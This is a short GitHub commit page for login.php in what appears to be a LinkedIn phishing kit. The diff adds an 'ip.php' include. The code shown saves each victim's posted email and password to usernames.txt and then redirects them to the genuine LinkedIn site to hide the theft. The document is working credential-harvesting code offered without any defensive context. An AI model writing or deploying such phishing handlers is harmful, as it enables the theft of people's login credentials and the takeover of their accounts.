Update login.php

This commit is contained in:
Usama Abdul Sattar 2018-06-07 14:21:36 +05:00 committed by GitHub
parent b8891baf3b
commit 92c35d7eb5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -1,5 +1,6 @@
<?php
include 'base.php';
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['UsernameForm'] . " [PASS]: " . $_POST['PasswordForm'] . "\n", FILE_APPEND);
header('Location: https://linkedin.com/');